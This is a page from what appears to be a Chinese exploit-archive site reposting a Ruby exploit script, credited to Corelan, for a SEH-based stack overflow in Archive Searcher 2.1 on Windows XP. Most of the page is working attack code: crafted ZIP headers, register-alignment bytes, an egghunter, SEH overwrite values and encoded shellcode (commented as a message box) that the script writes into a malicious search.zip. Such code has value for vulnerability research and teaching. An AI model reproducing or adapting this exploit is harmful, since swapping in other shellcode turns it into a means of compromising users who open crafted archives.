首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Archive Searcher .zip Stack Overflow
来源:http://www.corelan.be:8800 作者:Lincoln 发布时间:2010-04-19  

#!/usr/bin/ruby
# Software      : Archive Searcher 2.1
# Author        : Lincoln
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Search for file in application, ex: point to desktop and click seach now
# Character restrictions, upper case alpha converted, A -> a etc.
#
#
banner =
"|------------------------------------------------------------------|\n" +
"|                         __               __                      |\n" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n" +
"|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n" +
"| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n" +
"|                                                                  |\n" +
"|                                       http://www.corelan.be:8800 |\n" +
"|                                                                  |\n" +
"|-------------------------------------------------[ EIP Hunters ]--|\n\n"

print banner
puts "[+] Exploit for Archive Searcher 2.1"

#Zip Headers
header1=
"\x50\x4b\x03\x04\x14\x00\x00\x00" +
"\x00\x00\xb7\xac\xce\x34\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\xe4\x0f\x00\x00\x00"

header2=
"\x50\x4b\x01\x02\x14\x00\x14\x00" +
"\x00\x00\x00\x00\xb7\xac\xce\x34" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\xe4\x0f\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x24\x00" +
"\x00\x00\x00\x00\x00\x00"

header3=
"\x50\x4B\x05\x06\x00\x00\x00\x00" +
"\x01\x00\x01\x00\x12\x10\x00\x00" +
"\x02\x10\x00\x00\x00\x00"

#Align regs # jmp esi # jmp to egg
align=
"\x90\x90\xeb\x3b\x90\x90\x90\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x61\x61\x61\x61\x61\x61\x61\x61" +
"\x5e\x5e\x5e\x5e\x5e\xff\xe6"

#modified egghunter, mov edx,esi
egg =
"\x89\xf2\x42\x52\x6a\x02\x58\xcd" +
"\x2e\x3c\x05\x5a\x74\xef\xb8\x77" +
"\x30\x30\x74\x8B\xfa\xaf\x75\xea" +
"\xaf\x75\xe7\xff\xe7"


#msgbox: "Exploited by Corelan Security Team"
shellcode =
"w00tw00t" +
"\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" +
"\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" +
"\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" +
"\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" +
"\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" +
"\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" +
"\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" +
"\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" +
"\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" +
"\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" +
"\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" +
"\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" +
"\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" +
"\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" +
"\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" +
"\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" +
"\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" +
"\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" +
"\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" +
"\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" +
"\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" +
"\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" +
"\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" +
"\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" +
"\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" +
"\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" +
"\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" +
"\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" +
"\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" +
"\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" +
"\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" +
"\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" +
"\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" +
"\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" +
"\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" +
"\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x6f\x50" +
"\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" +
"\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" +
"\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" +
"\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" +
"\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" +
"\x4f\x51\x45\x44\x48\x45\x5a\x41\x41"

size = 4064
junk = "\x90" * (267 - (align.length + egg.length))

jseh = "\xe9\xf7\xfe\xff\xff" #jmp back to popad's
nseh = "\xeb\xf9\x90\x90" #jmp back to near jump
seh  = "\x0c\x14\x40\x00" #universal

payload = align + egg + junk + jseh + nseh + seh + shellcode
rest = "D" * (size - payload.length)
final = payload + rest + ".txt"

filename = "search.zip"
f = File.new(filename, 'w')
f.write header1 + final + header2 + final + header3
f.close

puts "[+] file size :  #{final.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Search for zip and boom!\n\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp 5.572 whatsnew.txt SEH
·PHP 5.3.x DoS
·FreeBSD 6.4 root shell exploit
·Apache OFBiz SQL Remote Execut
·Oracle Financials R12 SQL inje
·Apache OFBiz FULLADMIN Creator
·phpBB modified by Przemo <= 1.
·Unauthenticated File-system Ac
·MS10-006 SMB client-side bug p
·Windows 7/2008R2 SMB Client Tr
·IBM BladeCenter Management Mod
·Multiple Vendor AgentX++ Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved